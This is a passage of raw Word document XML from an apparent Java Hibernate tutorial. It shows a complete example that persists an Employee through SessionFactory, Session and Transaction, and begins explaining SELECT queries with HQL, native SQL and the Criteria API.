        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Shared across sessions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F29CDAC" w14:textId="77777777" w:rsidR="00024B53" w:rsidRPr="00CE4B95" w:rsidRDefault="00D706F7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Needs explicit configuration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76A9DE80" w14:textId="04E5CE59" w:rsidR="00D706F7" w:rsidRPr="00CE4B95" w:rsidRDefault="00D706F7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Reduces database hits for frequently accessed data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73480B41" w14:textId="77777777" w:rsidR="00D706F7" w:rsidRPr="00CE4B95" w:rsidRDefault="00D706F7" w:rsidP="00D706F7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Example Complete Flow</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4975A94E"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88"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>publ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class</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HibernateExample</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41ECEAFB"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publ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static</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void</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve"> main</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="660066"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>String</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args</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38FF6A43"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880000"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>// 1. Configure and build SessionFactory</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="399C6654"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SessionFactory</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve"> sessionFactory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Configuration</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="400E8420"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configure</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hibernate.cfg.xml"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07EF90C7"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buildSessionFactory</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C91CAE8"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p>
    <w:p w14:paraId="5021EAFD"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880000"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>// 2. Open session</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4040DB67"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Session</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve"> session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sessionFactory</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openSession</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="132DE30D"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Transaction</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve"> tx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ull</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="626C1B06"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p>
    <w:p w14:paraId="6855A2F3"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try</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38592217"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880000"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>// 3. Begin transaction</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E7D8FB7"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tx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session</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beginTransaction</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41FF44A2"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p>
    <w:p w14:paraId="78F8DCEE"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880000"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>// 4. Create and persist object</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E408DBE"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Employee</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve"> newEmploye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ew</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Employee</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D8AB8D3"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newEmployee</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setName</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Michael Johnson"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DE12170"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lastRenderedPageBreak/>
        <w:t xml:space="preserve">            newEmployee</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setSalary</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75000</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60CC94A9"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p>
    <w:p w14:paraId="23700278"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880000"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>// 5. Save to database</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B1B7EBA"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Long</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve"> employeeId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660066"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>Long</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session</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save</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newEmployee</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08D963D7"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0066"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>System</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000088"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>out</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println</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="008800"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>"Employee saved with ID: "</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employeeId</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16D7E069"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p>
    <w:p w14:paraId="72C8E38C"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880000"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>// 6. Commit transaction</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FCE7609"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tx</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commit</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E92FAA1"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catch</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660066"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>Exception</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve"> e</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77A5D7A3"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if</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tx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null</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tx</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rollback</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="304E90A9"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e</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printStackTrace</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51107464"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0088"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>finally</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7F4E07BA"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880000"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>// 7. Close session</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F8B5DE2"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session</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close</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="509D95EB"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sessionFactory</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close</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="488D4B16"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6F86685A" w14:textId="77777777"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p>
    <w:p w14:paraId="41A36A0C" w14:textId="5107974F" w:rsidR="00D706F7" w:rsidRPr="00CE4B95"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CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68D831C9" w14:textId="77777777" w:rsidR="00817C2D" w:rsidRPr="00CE4B95" w:rsidRDefault="00817C2D" w:rsidP="00D706F7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="756A1C72" w14:textId="114B3B07" w:rsidR="00D706F7" w:rsidRPr="00CE4B95" w:rsidRDefault="00D706F7" w:rsidP="00D706F7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Key Benefits of Hibernate Persistence</w:t>
      </w:r>
      <w:r w:rsidR="00D26DF8" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57EF8965" w14:textId="77777777" w:rsidR="00D706F7" w:rsidRPr="00CE4B95" w:rsidRDefault="00D706F7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Object-Oriented Approach - Work with objects rather than SQL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DA668F4" w14:textId="77777777" w:rsidR="00D706F7" w:rsidRPr="00CE4B95" w:rsidRDefault="00D706F7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Automatic SQL Generation - No need to write CRUD queries</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08786147" w14:textId="77777777" w:rsidR="00D706F7" w:rsidRPr="00CE4B95" w:rsidRDefault="00D706F7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Transaction Management - Built-in support for ACID properties</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58354870" w14:textId="77777777" w:rsidR="00D706F7" w:rsidRPr="00CE4B95" w:rsidRDefault="00D706F7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Caching - Improves performance</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="256B0273" w14:textId="1016DD52" w:rsidR="00D706F7" w:rsidRPr="00CE4B95" w:rsidRDefault="00D706F7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Database Independence - Switch databases with minimal code changes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="142B4CBE" w14:textId="2810FE3F" w:rsidR="00D706F7" w:rsidRPr="00CE4B95" w:rsidRDefault="00D706F7" w:rsidP="00D706F7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>This is the fundamental process of how Hibernate persists Java objects to relational databases while handling all the underlying JDBC complexity.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BBF6815" w14:textId="26454715" w:rsidR="00C97E60" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00D706F7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:pict w14:anchorId="08EDCFB0">
          <v:rect id="_x0000_i2394" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F19CA68" w14:textId="5D3BF809" w:rsidR="00054A9D" w:rsidRPr="00CE4B95" w:rsidRDefault="007E333A">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="542" w:name="_Toc196308022"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>How to retrieve select query using Hibernate</w:t>
      </w:r>
      <w:r w:rsidR="00054A9D" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="542"/>
    </w:p>
    <w:p w14:paraId="44DC6C8E" w14:textId="1999571B" w:rsidR="00490B22" w:rsidRPr="007F3379" w:rsidRDefault="00490B22" w:rsidP="007F3379">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>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To retrieve data using a SELECT query in </w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Hibernate</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, you can use one of the following approaches:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="573D4C44" w14:textId="77777777" w:rsidR="00490B22"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5685110">
          <v:rect id="_x0000_i2395" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="65A3B959" w14:textId="77777777" w:rsidR="00490B22" w:rsidRPr="007F3379" w:rsidRDefault="00490B22"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1. Using HQL (Hibernate Query Language)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="550A73B5"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HQL is object-oriented and works with entity class names and properties.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D05C192"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 session = sessionFactory.openSession();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30DFB736"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tring hql = "FROM Employee WHERE department = :dept";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11845CCD"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 query = session.createQuery(hql);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DE8D135"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setParameter("dept", "IT");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07AEA298"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ist&lt;Employee&gt; results = query.list();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51A04782"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close();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CE4191A" w14:textId="77777777" w:rsidR="00490B22"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DFAB8F1">
          <v:rect id="_x0000_i2396" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="25A3A9E0" w14:textId="77777777" w:rsidR="00490B22" w:rsidRPr="007F3379" w:rsidRDefault="00490B22"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2. Using Native SQL Query</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12B8CF65"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Useful when you want to write database-specific SQL.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56F90113"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 session = sessionFactory.openSession();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29AB1643"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tring sql = "SELECT * FROM employee WHERE department = :dept";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2381D272"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 query = session.createSQLQuery(sql).addEntity(Employee.class);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46732B8B"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setParameter("dept", "IT");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B5A3BF4"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ist&lt;Employee&gt; results = query.list();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FBACBEB"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close();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C2DCCC4" w14:textId="77777777" w:rsidR="00490B22"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695BF22">
          <v:rect id="_x0000_i2397" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="24153F3D" w14:textId="77777777" w:rsidR="00490B22" w:rsidRPr="007F3379" w:rsidRDefault="00490B22"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3. Using Criteria API (Hibernate 5 and below)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E27DE4D"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For dynamic query building.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A881354"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 session = sessionFactory.openSession();</w:t>
      </w:r>
    </w:p>
